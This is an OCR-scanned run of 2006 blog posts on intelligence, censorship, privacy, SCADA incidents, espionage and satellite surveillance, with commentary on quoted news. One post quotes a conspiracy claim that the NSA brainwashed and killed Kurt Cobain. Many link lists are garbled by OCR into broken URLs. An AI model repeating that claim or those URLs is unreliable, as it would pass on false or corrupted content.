2.9.33 Able Danger’s Intelligence Unit Findings Rejected (2006-09-25 02:44) 


[1] * The much hyped [2]Able Danger [3]lntelligence unit which has supposedly collected 
and identified information on the 9/11 terrorist attacks [4]claim was officially rejected : 


The report found that the recollections of most of the witnesses appeared to focus on a 
“single chart depicting Al Qaedacells responsible for pre-9/11 terrorist attacks” that was 
produced in 1999 by a defense contractor, the Orion Scientific Corporation. 


While witnesses remembered having seen Mr. Atta’s photograph or name on such a 
chart, the inspector general said its investigation showed that the Orion chart did not list Mr. 
Atta or any of the other Sept. 11 terrorists, and that “testimony by witnesses who claimed 
to have seen such a chart varied significantly from each other.” The report says that a 
central witness in the investigation, an active-duty Navy captain who directed the Able Danger 
program, had changed his account over time, initially telling the inspector general’s office last 
December that he was “100 percent” certain that he had seen “Mohamed Atta’s image on the 
chart.” 


Issues to keep in mind: 

- the chaotic departamental information sharing or the lack of such, budget-deficit arms race, 
thus departments wanting to get credited for anything ground breaking 

- prioritizing is sometimes tricky, wanting to expand a node, thus gather more intelligence and 
more participants might have resulted in missing the key ones, marginal thinking fully applies 
- [5JOSINT as this [6]Social Network Analysis of the 9-11 Terror Network shows, is [7]an 
invaluable asset and so is the momentum and actual use of the data 


Despite that if you don’t have a past, you’re not going to have a future, true leaders 
never look into the past, they shape the future and don’t mind-tease what they could have 
done. Necessary evil moves the world in its own orbit now more than ever, and if you really 
don’t have a clue what I’m trying to imply here, then you’re still not ready for that mode of 
thinking. 


So, [8]the man who knew, but no one reacted upon his findings in a timely manner, or 
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a case-study of how terrabytes of mixed OSINT and Intelligence data weren’t successfully 
[9]data mined? | go for the first point. 


Able Danger chart courtesy of the [10]Center for Cooperative Research. 


1. ftp: //photosl, blogger. con/blogger/1999/1776/1600/501_able_danger_char®. jpg 
2, hitp:/ any. abledangerblog. con/ 

3, http: //en. wikipedia org/iki/ Able, Danger 

4, het: //wwy.nytines.con/2006/09/22/us/22able heal? z6f=o8 

5, http:/ /adanchey. blogspot .con/2006/08 /benefits- of -open-source~ intelligence heal 
6 

7 

8 
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. http://www. orgnet.com/prevent .htm 


s=onktopics=onktimelines=onkprojects=onktitles=onkdesc 


2.9.34 Terrorism and Response 1990-2005 (2006-09-25 03:56) 


[1] * Very informative and objective retrospective on the response to terrorism from 1990 
to 2005. The [2]syllabus by Bruce D. Larkin and Ben Lozano is even more resourceful with its 
"what if" brainstorming questions. 


Here’s another [3]map of terrorist networks in America for 1991-2005, based on states 
and possible cell of operation - two more previous [4]versions [5]available. 


1. http: //photos1.blogger.com/blogger/1933/1779/1600/Terrorism. 1990-2006. png 
2. http: //www.learnworld.com/COURSES/P72/P72.Syllabus .htm 


3. http://www. dickdestiny.com/blog/2006/09/united-states-of-al-qaeda-terrorists.html 
4. http://www.doglegs .net/cclovett/9/Terrorist_Map_of_the_US.jpg 


5. http: //www.homelandsecurityus.net/images/terrorist/%20network/20in/20america. bmp 


2.9.35 Media Censorship in China - FAQ (2006-09-27 12:23) 


[1] * Controversial to the generally accepted perspective that [2]China’s Internet censorship 
efforts are [3]primarily a [4]technological solution only, | feel it’s self-regulation as a state of 
mind that’s having the greatest impact on the success of their efforts - the very same way 
you're being told not to misbehave while seeing yourself on a monitor when entering a store 
for instance. [5]Self-censorship as a state of mind by itself is a way of hiding the plain truth 
that the Chinese government is aware it cannot fully control what information is coming in, 
and going out of the country. That of course doesn’t stop it from speculating it still can. Here’s 
a recent [6]FAQ on the Media Censorship in China answering the following questions : 


[7]What is the current media policy in China? 

[8]How free is Chinese media? 

[9]What are the primary censoring agencies in China? 
[10]How does China exert media controls? 

[11]How does China control the influence of foreign media? 
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[12]How do journalists get around media control measures? 
The main agencies responsible for history engineering : 


"But the most powerful monitoring body is the Communist Party’s Central Propaganda 
Department (CPD), which coordinates with GAPP and SARFT to make sure content promotes 
and remains consistent with party doctrine. Xinhua, the huge state news agency (7,000 
employees, according to Official statistics), is beholden to the CPD and therefore considered 
by press freedom organizations to be a propaganda tool. The CPD gives media outlets 
directives restricting coverage of politically sensitive topics—such as protests, environmental 
disasters, Tibet, and Taiwan—which could be considered dangerous to state security and party 
control." 


Centralization as the core of control, why am | not surprised? Don’t tolerate [13]censor- 
ship, learn [14]how to undermine it. 


. http://photos1. blogger .com/blogger/1933/1779/1600/Censorship. 1. jpg 
. http: //ddanchev. blogspot . com/2006/02/chinese- internet-censorship-efforts .htm 


ttp://ddanchev.blogspot.com/2006/07/chinas- interest-of-censoring-mobile.htm 


. http: //ddanchev. blogspot . com/2006/08/chinas-internet-censorship-report- 2006 .htm 


1 
2 
3 
4 
5. http: //ddanchev.blogspot.com/2006/07/south-koreas-view-on-chinas-media.htm 
6 
7 
8 
9 


_netp:/ /wiw.cfrorg/publication/11815/43 
| hetp:/ /wiw.cfrorg/publication/11515/13 
_netp://wuw. cfr org/pubLication/11515/44 
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2.9.36 Afterlife Data Privacy (2006-09-27 13:36) 


[1] * Have you ever asked yourself what’s going to happen with your digital data in case the 
worst happens, or most importantly, the pros and cons of privacy in such a situation? 


[2]Taking passwords to the grave is always be default, and while your email service provider 
may get socially engineered - or have to comply with a court order - under the excuse of 
emotional crisis, family relations, reconsider how you would like to have your (accounting) 
data handled : 


"The situation poses a dilemma for e-mail providers that are pilloried by privacy rights 
advocates at the mere suggestion of sensitive data being exposed, at the same time they are 
expected to hand over the digital keys to family members when a customer dies. Last year, 
Yahoo was forced to provide access to the e-mail of a U.S. Marine killed in Iraq to his father, 
[3]who got a court order in the matter. "The commitment we’ve made to every person who 
signs up for a Yahoo Mail account is to treat their e-mail as a private communication and to 
treat the content of their messages as confidential," said Yahoo spokeswoman Karen Mahon. 
Beyond acknowledging that Yahoo complies with court orders, Mahon declined to discuss 
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Yahoo’s requirements for providing family members access to the e-mail accounts of their 
deceased loved ones. Google will provide access to a deceased Gmail user’s account if the 
person seeking it provides a copy of the death certificate and a copy of a document giving the 
person power of attorney over the e-mail account, said a Google spokeswoman." 


Whereas some inboxes should never be opened - your spouse’s one for instance - lead- 
ing email providers have already established practices when dealing with such requests 
and | feel the lack of reliable stats on the occurrences of such isn’t proving the necessary 
discussion. The majority of people | know don’t just have a black and white sides of their 
characters, they’re too colorful to hide it both offline and online, and that’s what makes 
them "people | know". Changing a [4]provider’s privacy policy wouldn’t necessarily have 
a significant effect unless an author’s email communication truly becomes his property, 
while on the other hand local laws could ruin the effect. It would be highly flexible if users 
are offered the opportunity to speak for themselves and their [5]privacy while still able to do it. 


Sometimes, on your journey to happiness and emotional balance you end up opening 
more and more of pandora’s boxes, when what you’re looking for is right inside your head - 
the clear memory of the person in question, not the pseudo-individuality in all of its twisted 
variations. Make sure what you wish for, as it may actually happen! 


The ultimate question - [6]Why does a deceased soldier's email thoughts become the 
property of a company? 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/VR.0. jpg 
2. http: //news.com.com/Taking+passwords+tot+thetgrave/2100-1025_3-6118314.htm 


3. http://news.com.com/Yahootreleases+e-mailtof+deceased+Marine/2100-1038_3-5680025.htm1?tag=n 


4. http: //ddanchev. blogspot .com/2006/09/examining-internet-privacy-policies.htm 


5. http: //del.icio.us/DDanchev/Privac 
6. http: //exlibris.memphis.edu/ethics21/archives/05eei/papers/louis. pdf 


2.9.37 Anti-Counterfeiting Technologies (2006-09-28 00:47) 


[1] *® Handy [2]overview of various anti-counterfeiting technologies and where they're 
primarily used at, such as Holograms, Optically variable inks, Microlenticular technology, 
Special inks, Nanomarkers, and yes, RFID tags, but keep in mind that they used to be "covert" 
decades ago, but in the passports of some nowadays. 


You might find a previous post "[3]Pass the Scissors" worth reading as well. 


1. http: //photos1.blogger.com/blogger/1933/1779/1600/ten_bucks. jpg 
2. http: //www.csoonline.com/read/090106/brf_anti-counterfeit .html 
3. http: //ddanchev. blogspot .com/2006/05/pass-scissors.htm 


2.9.38 NSA Mind Control and PSYOPS (2006-09-28 01:02) 


[1] * Basics of recruiting, interrogations, [2]brainwashing and [3]PSYOPS on the foundations 
of Visual Hallucinations, Event-Triggered (conditional) Implant Delivery, and Complete Quiet 
Silence? Maybe, but this [4]article is full of interesting concepts, consider however skipping 
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the part on how the NSA brainwashed Curt Cobain : 


"Curt Cobainof the musical group "Nirvana" was another victim of NSA brainwashing and was 
terminated by NSA. Cobain had started writing clues to the NSA activities into his music to 
communicate it to his music followers. He referred in music to the NSA as the "Friends inside 
his head". Once the NSA puts on the highest level of brainwashing pain, the subject expires 
quickly. Cobain used heroin to numb and otherwise slow the effect of the brainwashing." 


He had different "[5]friends". 


Related resources: 
[6]Intelligence 
[7]NSA 


1. 

2. http://en.wikipedia. org/wiki/Brainwashing 

3. 
4. 

5. http://en.wikipedia. org/wiki/Curt_cobain#Cobain.27s_final_weeks 

6. 

7 


2.9.39 Satellite Imagery of Secret or Sensitive Locations (2006-09-28 02:12) 


[1] * Continuing the [2]Travel Without Moving Series, and a previous post on [3]Open Source 
North Korean IMINT Reloaded, this collection of Google Earth, Google Maps, Local Live and 
Yahoo Maps versions of [4]secret or sensitive locations is worth browsing through. Included 
coordinates for over 80 locations, for instance : 


- Predator Drone Returning From Mission 

- Predator Drones at Remote Airstrip 

- Predator Drone Taking Off From Remote Airstrip 

- TAGS 45 'Waters’ 

- M80 ’Stiletto’ Stealth Boat 

- U-2 Being Readied For Mission 

- Underground Hangars at Sunchon Airbase 

- North Korean No-Dong Missile Assembly Building 
- Former MI6/FCO high security SIGINT enclave at Poudon 
- Former NSA/DOD satellite intercept site 

- CIA ’Black Site’ for terrorist interogations 

- Russian Foreign Intelligence (SVR) Headquarters 
- CFS Leitrim - Satellite Singal Interception station 
- Russian Don-2NP Pill Box Radar 

- Star Wars missile defense support site 

- AN/FRD-10 Classic Bullseye Antenna 

- Radomes on Fort Belvoir 

- Northrop "Secret" Research Facility 

- Classic Bullseye listening antenna array 
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As you will find out the data provided is a historical one - the UAVs and B2s have al- 
ready dissapeared for instance. Does the publicly obtainable imagery represent a threat to 
these locations? Not necessarily, as threats from which these facilities were supposed to be 
protected from have been replaced by ones requiring a different perspective. The dishes 
however, are still there, listening.. 


Related posts and resources: 

[5]Satellite 

[6]Defense 

[7]Military 

[8]Japan’s Reliance on U.S Spy Satellites and Early Warning Missile Systems 
[9]Stealth Satellites Developments Source Book 

[10]Anti Satellite Weapons 


_fitep://photost. blogger. cou/boggex 1888/1778 /1600/9422. jpg 
( Eee OS eT 
Erdal ogopot,coa/ 2000/07 open source nonce tartan talus tal 

. http: //virtualglobetrotting. com/category/buildings/covert/0/?v=0&f=0kso=1 
cep: /aet tet un/Doancher/savernied 

"hvtp://aet.icio.us/BDanchev/Detensa 

_fcep://aelcto us/ODanchev/Witiver] 


ttp://ddanchev. blogspot .com/2006/07/japans-reliance-on-us-spy-satellites.htm 


. http: //ddanchev. blogspot .com/2006/09/stealth-satellites-developments-source.htm 
10. http: //ddanchev.blogspot.com/2006/08/anti-satellite-weapons.htm 
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2.9.40 Government Data Mining Programs - Interactive (2006-09-28 02:56) 


[1] * Avery [2]extensive visualization of various U.S government data mining programs : 


"Individually, each piece of information gives only a small glimpse into people’s lives - 
but over time, these bits of personal information can begin to reveal patterns. Such as the 
places they go, the products they buy, or perhaps the type of people they associate with.This 
pattern-recognition process is called “Data Mining” or sometimes “Knowledge Discovery.” 
Since September 11, the federal government - especially intelligence and law enforcement 
agencies - have turned to data mining programs to make sense of growing oceans of data. 
The end result isn’t always about discovering what people have done - but what people might 
do tomorrow. What does a terrorist look like? What is the culmination of their credit, contacts, 
purchases and travel? Is it possible that you might share these similar patterns? Chances are 
at least some of these programs sift through personal information about you." 


Go through the questionnaire for a specific case, directly on a program of interest and 
see its relationship with the rest, if any of course. Go through a previous post on [3]Able 
Danger’s Intelligence Unit Findings Rejected to find out more about the state of information 
sharing. 


1. http: //photos1.blogger.com/blogger/1933/1779/1600/data_mining interactive.0.jpg 


2. http: //newsinitiative.org/story/2006/09/01/government_data_mining programs 
3. http: //ddanchev. blogspot .com/2006/09/able-dangers-intelligence-unit.htm 
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2.10 October 


2.10.1 Mark Hurd on HP’s Surveillance and Disinformation (2006-10-04 18:22) 


[1] * Straight from the source - HP’s CEO, one that compared to Fiorina’s qualitative ap- 
proaches decided to shift the company’s strategy to a quantitative internal benchmarking 
model - one is always fulfilling the other and vice versa - and he succeeded, but with today’s 
competitive environment and seek for "the next big thing" some companies are sacrificing 
productivity for insider fears related investigations. [2]Not that there aren’t any, it’s just that 
this particular case is nothing more than a bored top management employee sending signals 
to the press. Next time it would be a top floor hygiene COO’s comments on how HP are 
definitely up to something given the late hour conference meetings, the press will quote as 
"an insider source leaked this to us" type of quotation : 


"Now the question is do you pick up the document and turn to page whatever, or do 
you say, ‘are you sure?’ He says ‘I’m sure.’ So then you say, ‘what are we going to do?’ 
Now let me give you two thoughts. You could react by not confronting the problem. You talk 
about ethics. We’ve gone down the backward looking view. There’s also the dimension that 
says, are you going to bury this or confront it. Pretty big question, right? And | want to make 
something clear. | only know of the facts around the one leak. | don’t know, there’s been 
a lot of speculation around tens of leaks, and they associate with this one person [Jay Key- 
worth, a longtime HP board member]. This fact was about one leak from this one person who 
is a really good guy in the sense of contributions he made to Hewlett Packard over many years. 


So now you’re confronted with data that says, great contributor, and the team is look- 
ing at Pattie [Then board chairman Patricia Dunn] and saying ‘what are you going to do.’ And 
| can tell you if you’re looking down at this room as you’re making a decision, my first reaction 
wasn’t to say, ‘hey Pattie, why don’t you look backward at how the data was collected.’ The 
stress was, how are you going to confront the fact that was being presented to you. You're 
going to do what? 


Now to your point, knowing what we know now | wish we'd looked at a different set of 
facts. But even at that point, what had been done had been done. You’d have been reacting 
at that point in time. | don’t want to shirk any of this. The buck stops with me. But you can’t 
have a CEO of a company our size being the backstop. The thought that I’m going to catch 
everything - revenue, costs, personnel decisions, investigations... you know the scale of this 
company." 


Catch up with the case through a [3]previous post on the topic, and [4]keep on [5]read- 
ing. 


ttp://money.cnn.com/2006/09/29/technology/pluggedin_lashinsky_hurd.fortune/index .htm?section=money_tech 


. http: //ddanchev. blogspot. com/2006/09/hp- spy ing-on-board-of-directors-phone. htm 


4. http://del.icio.us/DDanchev/Surveillance 
5. http://del.icio.us/DDanchev/Privac 
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2.10.2 Filtering "Good Girls" and IM Threats (2006-10-05 15:21) 


NEVER trust that 
people you meet on 
the internet are really 


whe they say they are. 


=, f bt, 


[1] Respecting your kids’ right to privacy while wanting to ensure 
you're aware of the type of people they IM with? Consider a recently launched initiative, 
[2]IMSafer aims to filter, not spy on kids : 


"Keeping children safe from predatory adults in online communication is a service in 
high demand, but in order for children to participate the parental contro! needs to be kept 
to a minimum. [3]/MSaferis a service that launched today and promises to filter IM com- 
munication for conversation deemed potentially predatory. The company says it worked 
with law enforcement specialists to develop its filtering rules and some of them are quite 
interesting - the phrase “you're a good girl” is believed to be common language for building a 
dominance/submission based relationship, for example. Only questionable excerpts from IM 
conversations will be shown to parents; the company hopes that this relative privacy will help 
buy-in from kids." 


Yet, this is a great example of marginal thinking when it comes to detecting potential 
child abuse activities with respect to little princess’s - why not prince? - right to digital privacy. 
Whereas in the spirit of Web 2.0, the concept is primarily driven by the collective wisdom of 
parents participating and shaping the service’s database and increasing interactions, IMSafer 
has already [4]predefined categories of alerts : 


"1. Someone looking to make direct contact (i.e. coming to your house) 
. Someone looking to make indirect contact (i.e. calling a phone) 

. Personal information (i.e. phone numbers) 

. Obscene language 

. Specific and sexual references to body parts 

. Specific references to sexual acts 

. Anything related to pedophilia" 


NOOR WN 


Issues to keep in mind : 

- the differently perceived dangerous or offensive conversation by parents 

- the presumption that the "predator" would be using the same username next time, thus 
establishing long-lasting reputation 

- how kids feeling in the middle of a silent war with their parents could simply IM from another 
location, one without the software installed excluding the possibilities of bypassing it with 
nerdy talk or vulnerabilities and hacks appearing on-the-fly 

- monitors IM only, thus email, IRC, and forums remain an option for further communication 
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Don’t emphasize on spying, not even filtering, but on educating your kids, thus gaining 
their participation in the process of building awareness on what’s are potentially dangerous IM 
activities. From another perspective, do bored or adventurous kids spend time chatting with 
strangers? | think boringness, loneliness, the lack of strong, even developed communications 
with their folks is the root of the problem. And yes, predators acting as online stalkers, thus 
improving their chances of utilizing a long-lasting conversation. 


Related posts: 
[5]What’s the potential of the IM security market? Symantec thinks big 
[6]"IM me" a strike order 


1. http://photos1 . blogger . com/blogger/1933/1779/1600/sheep_wolf.git 

2. http: //www.techcrunch. com/2006/10/03/imsafer-filters-not-spies-on-kids/ 
3. http: //imsaf er. com/ 

4. http: //imsafer .com/splash/faq 


5. http: //ddanchev. blogspot. com/2006/01/whats-potential-of-im-security-market.htm 
6. http: //ddanchev. blogspot. com/2006/04/im-me-strike-order.htm 


2.10.3 Terrorist Letters and Internet Intentions (2006-10-05 15:49) 


[1] A juicy recently [2]de-classified letter to Zarqawi courtesy of the 
[3]Combating Terrorism Center, reveals possible intentions for Internet based communications 


"We advise you to maintain reliable and quick contact, with all the power you can muster. I 
am ready to communicate via the Internet or any other means, so send me your 
men to ask for me on the chat forum of Ana al-Muslim, or others. The password 
between us is that thing that you brought to me a long time ago from Herat. Then, 
after that, we would agree with them about e-mails, or you should instruct your men who are 
in the country that I live in to develop communications with us. We are ready to write to you 
and to consult with you regarding opinions anytime directly. “By the time, Surely man is at a 
loss, Except for those who believe and do good, and exhort one another to Truth, and exhort 
one another to patience." 


Rather primitive suggestion [4]compared to the [5]alternatives, it sounds more of a loyal ji- 
hadist trying to demonstrate his determination of making an impact. The other day | came 
across to an article mentioning the possibility of "[6]suicidal hackers", that is hackers who 
doesn’t care whether they’ll be caught or not in a possible information warfare scenario - 
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[7]chinese hackers have been utilizing the power of masses, thus disinforming on the actual 
sophistication of the attack and directing the traceback efforts to script kiddies. 


However, in this case that’s an example of a suicidal jihadist. 


. http://photos1. blogger .com/blogger/1933/1779/1600/female-suicide-bomb. jpg 

. http: //www.ctc.usma.edu/harmony/CTC-AtiyahLetter . pdf 

. http: //www.ctc.usma.edu/harmony.asp 

http: //ddanchev. blogspot .com/2006/08/cyber-terrorism-communications-and_22.html 

. http: //ddanchev. blogspot .com/2006/08/steganography-and-cyber-terrorism. html 

. http: //www.zdnet .com.au/news/security/soa/Army_expects_suicide_hacker_attacks/0, 130061744, 339271362, 00.htm 
. http: //ddanchev. blogspot .com/2006/09/chinese-hackers-attacking-us. html 


1 
2 
3 
4. 
5 
6 
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2.10.4 SCADA Security Incidents and Critical Infrastructure  Insecurities 
(2006-10-05 16:21) 


[1] 


A [2]decent article on the topic of the most hyped [3]cyberterrorism threat of them all - direct 
attack on the critical infrastrcture of a country by [4]attacking the SCADA devices - despite 
increased connectivity and integration with third-party networks, for the time being miscon- 
figurations and failures in maintainance make their impact. What is critical infrastructure 
anyway? In the days when it used to be a closed network, that is one isolated from the Internet 
and performance-obsessed top management, dealing with threats was benefiting from the 
controlled environment compared to the open Internet. Converging both infrastructures to 
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maximize performance, project demand and supply, thus achieving cost-cutting and profits 
results in the basic truth that poluting the Internet would inevitably influence the what used 
to be closed critical infrastructure one - and it [5]Jalready happened on several occasions. 
Incident in Australia : 


"That was the case in Australia in April 2000. Vitek Boden, a former contractor, took 
control of the SCADA system controlling the sewage and water treatment system at Queens- 
land’s Maroochy Shire. Using a wireless connection and a stolen computer, Boden released 
millions of gallons of raw sewage and sludge into creeks, parks and a nearby hotel. He 
later went to jail for two years. Not surprisingly, U.S. companies are hesitant to talk about 
the security of their SCADA networks for fear they may give clues to hackers. But security 
consultants say problems with them are widespread. Allor’s company, for instance, regularly 
does audits of SCADA systems at major installations such as power plants, oil refineries and 
water treatment systems. 


Almost invariably, Allor said, the companies claim their SCADA systems are secure and 
not connected to the Internet. And almost invariably, he said, ISS consultants find a wireless 
connection that company officials didn’t know about or other open doors for hackers. Real- 
izing the growing threat, the federal government two years ago directed its Idaho National 
Laboratory to focus on SCADA security. The lab created the nation’s first "test bed" for SCADA 
networks and began offering voluntary audits for companies." 


And more security incidents courtesy of Filip Maertens - [6]Cyber threats to critical in- 
frastructures slides : 


1992 - Chevron - Emergency system was sabotaged by disgruntled employee in over 
22 states 

1997 - Worchester Airport - External hacker shut down the air and ground traffic communica- 
tion system for six hours 

1998 - Gazprom - Foreign hackers seize control of the main EU gas pipelines using trojan 
horse attacks 

2000 - Queensland, Australia - Disgruntled employee hacks into sewage system and releases 
over a million liters of raw sewage into the coastal waters 

2002 - Venezuela Port - Hackers disable PLC components during a national unrest and general 
workers strike, disabled the country’s main port 

2003 - U.S East Coast blackout - A worm did not cause the blackout, yet the Blaster worm did 
significantly infect all systems that were related to the large scale power blackout 

2003 - Ohio Davis-Besse Nuclear Plant - Plant safery monitoring system was shut down by the 
Slammer worm for over five hours 

2003 - Israel Electric Corporation - Iran originating cyber attacks penetrate IEC, but fail to 
shut down the power grid using DoS attacks 

2005 - Daimler Chrysler - 13 U.S manufacturing plants were shut down due to multiple internet 
worm infections (Zotob, RBot, IRCBot) 

2005 - International Energy Company - [7]Malware infected HMI system disabled the emer- 
gency stop of equipment under heavy weather conditions 

2006 - Middle East Sea Port - Intrusion test gone wrong. ARP spoofing attacks shut down port 
signaling system 

2006 - International Petrochemical Company - Extremist propaganda was found together with 
text files containing usernames & passwords of control systems 
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Go through the [8]results of the Cyberstorm cyber exercise, and a previous post on [9]The 
Biggest Military Hacks of All Time to grasp the big picture of what [10]cyberterrorism and 
[11Jasymmetric warfare is all about. 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/scada. jpg 

2. http: //www.ajc.com/business/content/business/stories/2006/10/02/1001sbizscada. html 

3. http: //del. icio.us/DDanchev/Cyberterrorism 

4. http: //del. icio.us/DDanchev/SCADA 

5. http://www. computerworld.com/securitytopics/security/recovery/story/0, 10801, 84510, 00 html 
6 

7 

8 

9 


ttp://www.uniskill .be/downloads/UNISKILL_2006_-_ECSA_-_SCADA_Security_v_1.0.pdf 


. http://www. 1linuxsecurity.com/docs/malware-trends. pdf 


. http: //ddanchev. blogspot .com/2006/09/results-of-cyber-storm-exercise.html 


ttp://ddanchev. blogspot .com/2006/09/biggest-military-hacks-of-all-time.htm 


10. http: //ddanchev.blogspot.com/2006/05/techno-imperialism-and-effect-of.htm 


11. http: //www.blackhat .com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up . pdf 


2.10.5 Automated SEO Spam Generation (2006-10-12 13:27) 


[1] * In a previous post "[2]An Over-performing Spammer" | commented an impossible to 
both, read and detect scam message - loading remote email images is both, an infection and 
privacy exposing vector. In case you also remember [3]automated bots were also self-praising 
themselves over Ebay back in August. 


Just noticed a [4]good example (_ http://hsbc-internet-banking.1st-results-links-resource- 
7.info/No-Anti-Virus-So ftware-No-E-Banking-For-You/ ) of automated SEO spam generated 
page out of my "[5]No Anti-Virus Software, No E-banking For You" post : 


"Welcome to the No Anti Virus Software No E Banking For You one stop website! We of- 
fer the best information, resources and links on this side of the planet, you will find no greater 
and more comprehensive source for all your No Anti Virus Software No E Banking For You 
needs! ONLY at our website, will you find every Top Quality information and knowledge 
resource website on the No Anti Virus Software No E Banking For You topic! Please Enjoy your 
stay at your #1 No Anti Virus Software No E Banking For You website, and do remember to 
bookmark, come again and tell all your friends!" 


While it’s amusing, Google seems to have already picked up the now dissapeared sub- 
domain. | wonder when, and would Google utilize the "wisdom of crowds" concept when it 
comes to users signaling such search results the way it’s already flaging blogs? From another 
perspective, web application vulnerabilities in domains Google’s very found of have the 
potential to undermine any web site rating initiative. Such spam pages aren't the big problem, 
the big problem is an ecosystem that allows the author to take advantage of the "upcoming 
search traffic" on a topic while taking advantage of a marketing window of an event to abuse. 


1 cep //photost blogger con/blogger2/4008/2267/1600 Nose. gi 
beg //aaencusy st onspor coa/006/t6/ cree sorters cpamer. 

3, http: //adancnev.bogspt  con/2006/08/but-of-course-its~pleasant- transaction. htall 

4. http://209.85.129.104/search?q=cache: tonLpQFObrwJ: hsbc-internet- banking. 1st-results-links-resource-7.info/ 


5. http: //ddanchev. blogspot .com/2006/05/no-anti-virus-software-no- e-banking. htm 
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2.10.6 The Insider’s Guide to Georgia-Russia Espionage Case (2006-10-12 14:26) 


[1] ® An [2]informative FAQ on the most recent nation-2-nation espionage case, David vs 
Goliath aka Georgia’s counter-intelligence services spotting Russian military personnel per- 
forming HUMINT reconnaissance under Russia’s umbrella. It answers the following questions : 


- Russian spies in Georgia? | thought some of the folks in Atlanta looked a bit suspi- 
cious... 

- So what’s the problem this week? 

- And did Georgia back down? 

- What were four Russian military officers doing in Tblisi in the first place? 

- Anything else they’re unhappy about? 

- Is the situation likely to escalate any further? 


What happened actually? Russia is very interested in its post-soviet era "satellites" and 
their ongoing and upcoming activities with NATO, and yes, the U.S interest in breaking the 
ice by organizing various military exercises, even worse from Russia’s point of view - opening 
military bases and a country’s airspace to the U.S Air Force. Russia was basically underes- 
timating Georgi’s capabilities, sensitivity to the reconnaissance, and courage to go public 
with the findings if any, and later on acted as a wounded 800 pound gorilla feeling embarresed. 


Meanwhile, who’s been [3]killing all these journalists - 42 since 1992 - acting as the so- 
ciety’s watchdog, and was Anna Politkovskaya assassination on purposely done on Vladimir 
Putin’s birthday to destabilize the public opinion on the government’s capability to solve the 
case, and open up countless speculations on the similarities between [4]Georgi Markov’s case 
who was also killed on a puppet’s birthday? 


It’s the typical Fox Mulder situation, he knows everything about you, you know every- 
thing about him, do something to him and make him a hero of a cause, so | feel organized 
crime isn’t interested in Russia’s social accountability and is destabilizing the process. 


Related posts and resources: 

[5]Prosecuting Defectors and Appointing Insiders 
[6]A top level espionage case in Greece 
[7]India’s Espionage Leaks 

[8]Intelligence 

[9]Espionage 


. http://photos1. blogger .com/blogger/1933/1779/1600/david_vs_goliath. jpg 


. http: //edition.cnn.com/2006/WORLD/europe/10/02/insider .georgia/index.htm 
. http: //www.pbs.org/newshour/bb/media/july-dec06/russia_10-09.htm 


. http://ddanchev. blogspot .com/2006/06/travel-without-moving- georgi-markovs.htm 
. http: //ddanchev.blogspot .com/2006/09/prosecuting-defectors-and-appointing.htm 
. http: //ddanchev.blogspot .com/2006/02/top-level-espionage-case-in-greece. htm 

. http://ddanchev. blogspot .com/2006/07/indias-espionage-leaks .htm 

. http: //del.icio.us/DDanchev/Intelligence 


OANA UKFWN EH 


. http: //del.icio.us/DDanchev/Espionage 
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2.10.7 Luxury Vehicles on Demand (2006-10-12 15:02) 


[1] * Sharing luxury vehicles among club members who got bored of their Rolls Royce and 
want to experiment? 


Propositions like these are rather common for NYC and Las Vegas where people do crazy 
things on the top of their rich and bored euphoria - and why not?! Ultimate ownership as 
a driving force, or tiny private moment with what you’ve always wanted, what would you chose? 


"Demand is increasing for alternatives to traditional ownership of high-end cars. Mem- 
bership clubs and organizations offering fractional luxury-car ownership are in their infancy, 
as are agencies that rent new-model supercars, but they are expanding. More and more 
exotic-car drivers are finding they don’t spend enough time in their cars to justify owning them 
year-round and paying six-figure prices. If you’re a Manhattan executive with a Lamborghini, 
you probably don’t drive it to work each day. You might only use it on vacation. Or maybe you 
only bring out your Rolls-Royce. These are the kind of folks signing up. Another advantage of 
membership clubs is that instead of having to choose which car to buy, you can get a variety 
of different vehicles delivered in the course of a year. "It’s a bit of an addictive thing," said 
Fuller. "Once you've driven a Ferrari and a Bentley and a Lamborghini and a Lotus, you ask, 
‘What’s next on my hit list?’ 


It’s interesting to note that the major car manufacturers suffering from over-supply and 
becoming even more insensitive to customers’ preferences, are coming up with bargain deals 
when it comes to their most expensive jewels. 


Customer perceived pricing and value on luxury cars and brands positioned as the fastest, 
hottest, and trend-setting vehicles, indeed play a crucial role in the profit margins here. Then 
again, building the ultimate beast and waiting for a middle class citizen to finally manage 
to fulfil his or her America dream isn’t really what liquidity is all about. Ownership of luxury 
vehicles though, is still very concentrated. 


Intimate moment with your very own precious, or car manufacturers looking for greater 
liquidity while potentially turning luxury into a commodity? 


A trend definitely worth keeping an eye on, just make sure you [2]join the club first. 


1. http://www. forbes.com/home/lifestyle/2006/09/29/ferrari-bentley-rolls-life-autos_cx_d1_1002carclubs .htm 


2. 
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2.10.8 China Targeting U.S Satellite - Laser Ranging or Demonstration of Power? 
(2006-10-12 15:24) 


[1] In previous posts "[2]ls a Soace Warfare Arms Race 
Really Coming?,"[3]Weaponizing Space and the Emerging Space Warfare Arms Race", and 
"[4]Anti-Satellite Weapons" | covered various developments and emerging trends in respect to 
space warfare. Last week, [5]China supposedly conducted a jamming test on a U.S satellite, 
which is more of a [6]satellite ping in order to analyze the response data, rather than jamming : 


"The Defense Department remains tight-lipped about details, including which satellite 
was involved or when it occurred. The Pentagon’s National Reconnaissance Office Director 
Donald Kerr last week acknowledged the incident, first reported by Defense News, but said 
it did not materially damage the U.S. satellite’s ability to collect information. "It makes us 
think," Kerr told reporters. 


The issue looms large, given that U.S. military operations have rapidly grown more re- 
liant on satellite data for everything from targeting bombs to relaying communications to 
spying on enemy nations. Critical U.S. space assets include a constellation of 30 Global 
Positioning Satellites that help target bombs and find enemy locations. This system is also 
widely used in commercial applications, ranging from car navigation systems to automatic 
teller machines. 


The Pentagon also depends on communications satellites that relay sensitive messages 
to battlefield commanders, and satellites that track weather in critical areas so U.S. troops 
can plan their missions." 


What this really was is a rather common [7]satellite ranging practice, thus determing 
the exact geocentric position of the U.S satellite and tracking it, which is a bit of a unethical 
move, but given there’s no code of honor in space yet, it’s more of a demonstration of ongoing 
R &D activities to me. 


1 
2. 

3 
4 
5. 
6. 
TD 


ttp://news.yahoo.com/s/nm/20061005/ts_nm/arms_space_dc 
ttp://www.ngs.noaa.gov/PUBS_LIB/Geodesy4Layman/TR80003D . HTM 


ttp://en.wikipedia.org/wiki/Satellite_laser_ranging 
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2.10.9 The History and Future of U.S. Military Satellite Communication Systems 
(2006-10-12 17:32) 


[1] mic Resourceful and visually rich retrospective on the developments 
